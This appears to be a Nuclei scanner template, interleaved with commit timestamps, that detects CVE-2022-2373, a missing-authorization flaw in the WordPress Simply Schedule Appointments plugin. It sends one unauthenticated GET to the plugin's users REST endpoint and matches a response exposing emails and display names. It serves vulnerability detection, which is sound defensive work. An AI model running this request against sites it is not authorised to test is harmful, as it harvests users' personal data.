2022-11-09 14:43:06 +00:00
id : CVE-2022-2373
info :
2023-04-07 15:51:10 +00:00
name : WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure
2022-11-10 15:31:21 +00:00
author : theamanrawat,theabhinavgaur
2022-11-09 14:43:06 +00:00
severity : medium
description : |
2023-04-07 15:51:10 +00:00
WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.
2022-11-09 14:43:06 +00:00
reference :
- https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31
- https://wordpress.org/plugins/simply-schedule-appointments/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2373
2022-11-10 17:22:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2022-2373
cwe-id : CWE-862
2023-07-11 19:49:27 +00:00
epss-score : 0.00482
cpe : cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*
2022-11-09 18:07:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : nsqua
product : simply_schedule_appointments
2022-11-10 16:59:00 +00:00
tags : simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp
2022-11-09 14:43:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-09 18:48:46 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-json/ssa/v1/users"
2022-11-09 14:43:06 +00:00
2022-11-09 18:48:46 +00:00
matchers-condition : and
2022-11-09 14:43:06 +00:00
matchers :
2023-07-11 19:49:27 +00:00
- type : word
part : header
words :
- application/json
2022-11-09 14:43:06 +00:00
- type : regex
regex :
2022-11-09 18:48:46 +00:00
- 'response_code":200'
2022-11-09 14:43:06 +00:00
- '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"'
condition : and
- type : status
status :
2022-11-09 17:54:22 +00:00
- 200